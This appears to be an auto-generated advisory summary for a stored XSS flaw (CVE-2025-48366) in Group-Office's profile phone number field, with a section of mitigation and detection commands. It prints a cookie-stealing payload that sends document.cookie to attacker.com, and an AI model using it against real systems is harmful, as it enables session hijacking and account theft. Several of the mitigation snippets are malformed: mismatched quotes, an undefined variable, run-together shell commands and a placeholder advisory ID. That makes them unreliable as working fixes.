Listen to this Post
How CVE-2025-48366 Works
This stored XSS vulnerability in Group-Office allows attackers to inject malicious JavaScript into the Phone Number field of user profiles. When another user views the compromised profile in the Address Book, the payload executes automatically without interaction. The attack leverages improper input sanitization, enabling persistent script execution that can perform actions like session hijacking, forced redirects, or data exfiltration via unauthorized fetch requests. The vulnerability affects all versions before 6.8.119 and 25.0.20.
DailyCVE Form
Platform: Group-Office
Version: <6.8.119, <25.0.20
Vulnerability: Stored XSS
Severity: Medium
Date: 05/29/2025
Prediction: Patch expected by 06/15/2025
What Undercode Say:
Analytics:
- Attack complexity: Low (no user interaction required)
- Exploitability: High (publicly accessible fields)
- Prevalence: Limited to Group-Office instances with outdated versions
Exploit Commands:
// Payload for Phone Number field:
"><script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>
Mitigation Commands:
1. Immediate Workaround:
UPDATE go_users SET phone = REGEXP_REPLACE(phone, '[<>"\']', '') WHERE phone LIKE '%<%';
2. WAF Rule to Block XSS:
location /groupoffice {
modsecurity_rules 'SecRule ARGS "@detectXSS" deny,status:403";
}
Patch Verification:
curl -s https://example.com/groupoffice/ | grep -q "6.8.119" && echo "Patched" || echo "Vulnerable"
Detection Script (Python):
import requests
vuln_endpoint = "/groupoffice/modules/addressbook/view.php"
response = requests.get(target + vuln_endpoint)
if "<script>" in response.text:
print("XSS Detected")
Upgrade Instructions:
wget https://downloads.group-office.com/6.8.119/groupoffice.tar.gz tar -xzf groupoffice.tar.gz chown -R www-data:www-data /var/www/groupoffice
References:
- GitHub Advisory: GHSA-xxxx-xxxx-xxxx
- CVE Details: https://nvd.nist.gov/vuln/detail/CVE-2025-48366
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
